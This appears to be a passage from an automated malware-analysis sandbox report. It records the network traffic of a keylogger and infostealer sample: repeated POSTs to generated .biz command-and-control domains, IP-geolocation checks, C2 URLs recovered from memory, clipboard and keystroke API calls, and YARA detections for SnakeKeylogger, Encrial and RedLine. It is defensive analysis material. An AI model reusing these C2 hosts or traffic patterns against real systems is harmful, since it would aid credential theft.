                  Source: global trafficHTTP traffic detected: POST /hwjtljgqnsqgbc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /widfafwxfswrij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET /widfafwxfswrij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /widfafwxfswrij?usid=26&utid=9204703590 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /hx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                  Source: global trafficHTTP traffic detected: POST /jenyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET /jenyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /jenyp?usid=26&utid=9204704395 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /nwqf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 842
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /rq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /vtrrtopft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /dmksqnbs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /vip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /lhocoojsqrafriia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /fnbbnvvirqhlfx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /laps HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /bkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /kf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: GET /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.fwiwk.biz
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49736 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49752 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_004722EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /widfafwxfswrij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /widfafwxfswrij?usid=26&utid=9204703590 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /jenyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET /jenyp?usid=26&utid=9204704395 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww99.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww99.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww12.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                  Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                  Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                  Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: ww99.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.fwiwk.biz
                  Source: unknownHTTP traffic detected: POST /lf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/q
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/qs#q
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/rq
                  Source: alg.exe, 00000003.00000003.1794290607.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/r
                  Source: alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
                  Source: alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/hwjtljgqnsqgbc
                  Source: alg.exe, 00000003.00000003.1840248607.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/hwjtljgqnsqgbcs
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/3?
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/7q
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/?q
                  Source: x.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/irtgqxbqsqyophmb
                  Source: x.exe, 00000001.00000002.1738685341.0000000000C42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/irtgqxbqsqyophmb&
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/irtgqxbqsqyophmbL
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/kqP
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1770456267.000000000066F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/lf
                  Source: alg.exe, 00000003.00000003.1764366023.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/lfu
                  Source: x.exe, 00000001.00000002.1738442951.0000000000C21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/irtgqxbqsqyophmbi
                  Source: alg.exe, 00000003.00000003.2410675571.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                  Source: alg.exe, 00000003.00000003.2412274626.0000000000667000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/dmksqnbs
                  Source: alg.exe, 00000003.00000003.2189424613.0000000000667000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/vtrrtopft
                  Source: alg.exe, 00000003.00000003.2189424613.000000000068B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
                  Source: alg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/widfafwxfswrij?usid=26&utid=9204703590
                  Source: alg.exe, 00000003.00000003.1933405508.000000000067B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/jenyp
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2410675571.0000000000695000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1966234277.0000000000690000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/widfafwxfswrij
                  Source: alg.exe, 00000003.00000003.1966328135.000000000064F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2423644007.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww99.przvgke.biz/widfafwxfswriju
                  Source: alg.exe, 00000003.00000003.2415308900.00000000004A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/
                  Source: alg.exe, 00000003.00000003.1977645728.0000000001570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
                  Source: alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                  Source: alg.exe, 00000003.00000003.2321824408.0000000001590000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1
                  Source: alg.exe, 00000003.00000003.1924055176.0000000001530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://parking3.parklogic.com/page/enhance.js?pcId=12&domain=przvgke.biz
                  Source: alg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/oauth2/authorize
                  Source: alg.exe, 00000003.00000003.1840894790.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/oauth2/authorizeInvalidBrowserSettingsBrowserCreationFailedInvalidRenderHand
                  Source: alg.exe, 00000003.00000003.1893965929.000000000069B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00474164
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00474164
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00473F66
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,1_2_0046001C
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0048CABC

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 4.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
